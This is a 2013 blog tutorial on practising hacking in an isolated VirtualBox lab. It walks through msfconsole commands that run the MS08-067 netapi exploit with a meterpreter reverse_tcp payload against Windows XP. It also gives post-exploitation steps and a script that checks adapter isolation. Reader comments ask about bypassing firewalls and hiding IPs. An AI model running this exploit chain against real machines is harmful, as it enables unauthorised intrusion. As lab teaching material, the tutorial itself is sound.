Saturday, March 30, 2013

How To Practice Hacking Without Getting Into Trouble - Part 2 (Hacking With Metasploit)

In Part 1, we learnt how to set up a hacking lab so that we can practice hacking without disrupting any real network or services. Now, in this article, I will discuss ways to actually start hacking on your own. Please note that I will be using Metasploit as the primary hacking tool. Metasploit is a huge collection of ready-to-use exploits which makes life easier for a penetration tester or ethical hacker. Metasploit comes pre-installed with BackTrack, so you don't need to do any extra installation. However, if you want to use a Windows machine as the attacker machine, you can also download Metasploit for Windows (around 390MB).

In this hack, I will be hacking Windows XP using the famous netapi exploit (don't worry if you don't know what that is). I'm showing this exploit because it works every time, and it is easy to demonstrate, especially for beginners.

I will be using BackTrack as the attacker and Windows XP as the victim, as configured in Part 1.
Start up the BackTrack machine and log in with the username root and the password toor.

After that, type startx to start the GUI. You are now greeted with the BackTrack interface. You can browse through all the menus and try out all the tools.
First, we will perform a port scan to see the open ports and (hopefully) find out the victim's operating system. Type nmap -O followed by the victim's IP address.

Now we know that our victim is running Windows XP SP2 or Windows Server 2003 and that port 445 is open. So, we can run the netapi exploit using Metasploit.

Start Metasploit by going to Start Menu->BackTrack->Exploitation Tools->Network Exploitation Tools->Metasploit Framework->msfconsole

Alternatively, you can open a terminal and type msfconsole

You now have the Metasploit console open and can start typing in commands. 

Type the following:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > exploit

Note: LHOST is your own IP address (the BackTrack machine). RHOST is the victim's IP address (the XP machine).

After typing all that, if you see a Meterpreter shell open, then congratulations! It means you were successful in exploiting the XP system.

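Meterpreter is the payload we selected above. Because we chose the reverse_tcp variant, the victim's computer connects back to our machine after it is exploited and gives us an interactive shell. Now that you have a Meterpreter shell, you can do virtually anything with that system.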

Type help to see all available commands.
Let's grab a screenshot of the victim: type screenshot

In order to get the command prompt of the remote system, type shell. After you get the shell, type ipconfig to prove that you are indeed in the XP system. You can now do virtually anything with the system.

If you have done all the steps correctly, then you have just managed your first actual hack with Metasploit. This is just the beginning. You can find more exploits for Windows XP and also for Windows 7. Install a Windows 7 virtual machine and keep trying out new exploits. In this tutorial, we learnt how to use Metasploit to run a basic exploit against a remote computer on the LAN, which means you successfully performed your first network hack. I highly suggest you try out this hack as it will really help you in getting started in the world of hacking.
In order to learn more about Metasploit, you can visit

Note: You have to update Metasploit regularly to get the latest exploits by typing msfupdate. However, since we have used the VirtualBox Host Only Adapter, there is no internet connectivity. In order to connect BackTrack to the internet, power it off and reset the adapter to NAT (in Network Settings, VirtualBox menu).
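
The adapter switch in the note above is easy to forget to undo, which leaves a lab machine with a route to the real network. The following check is an added example, not part of the original post: it reads the output of VBoxManage showvminfo with --machinereadable and reports any adapter that is not Host Only, internal or unattached. The VM names and sample outputs are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Input is the text printed by
#   VBoxManage showvminfo "<vm name>" --machinereadable
# where each adapter appears as a line such as nic1="hostonly" or nic1="nat".

# Print every adapter that is attached to something other than the
# host-only network, an internal network, or nothing at all.
lab_nics_exposed() {
    printf '%s\n' "$1" | tr -d '\r' |
    sed -n 's/^nic\([0-9][0-9]*\)="\([^"]*\)"$/\1 \2/p' |
    while read -r slot mode; do
        case "$mode" in
            hostonly|intnet|none|null) ;;   # stays inside the lab
            *) echo "nic$slot=$mode" ;;     # nat, bridged, natnetwork, generic
        esac
    done
}

# Succeeds only when no adapter leads out of the lab.
is_isolated() {
    [ -z "$(lab_nics_exposed "$1")" ]
}

# Constructed sample: victim VM on the Host Only adapter, as the note describes.
SAMPLE_HOSTONLY='name="XP-victim"
nic1="hostonly"
nictype1="Am79C973"
hostonlyadapter1="vboxnet0"
nic2="none"'

# Constructed sample: attacker VM left on NAT after running msfupdate.
SAMPLE_NAT='name="BackTrack"
nic1="nat"
nictype1="82540EM"
nic2="hostonly"
hostonlyadapter2="vboxnet0"'

# Usage on the host (VM name is hypothetical):
#   is_isolated "$(VBoxManage showvminfo "BackTrack" --machinereadable)" \
#       || echo "BackTrack can reach outside the lab; switch back to Host Only"
```

Run it on the host for both virtual machines before starting a practice session, and again after every msfupdate.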


  1. What if the firewall is active on the target system? How to bypass it to get the port?

  2. Please somebody tell me how to hide undetectable IP, because Google is detecting my proxy. I used Hotspot, Tor and others also.

  3. PM me at my email address

  4. I liked the way you put together everything, there is certainly no need to go any further to look for any additional information. You mentioned each and everything that too with much of ease.